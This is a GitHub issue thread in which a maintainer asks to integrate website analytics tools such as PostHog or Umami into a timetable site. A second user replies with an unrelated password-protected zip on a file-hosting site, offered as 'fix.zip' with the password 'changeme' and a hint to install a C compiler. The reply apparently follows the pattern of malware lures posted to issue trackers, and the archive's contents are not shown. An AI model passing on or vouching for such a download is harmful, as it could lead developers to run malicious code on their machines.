### ISSUE TITLE
[Feature Request] Website analytics tool integration

### ISSUE THREAD

**Issue by jsun969** [compsci-adl/mytimetable#13]
### Overview

Integrate website analytics tools

### Details

- https://posthog.com/
- https://github.com/umami-software/umami

### Why would this feature be useful?

Statistics of website visits, error messages

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive password: changeme

you may need to install the c compiler
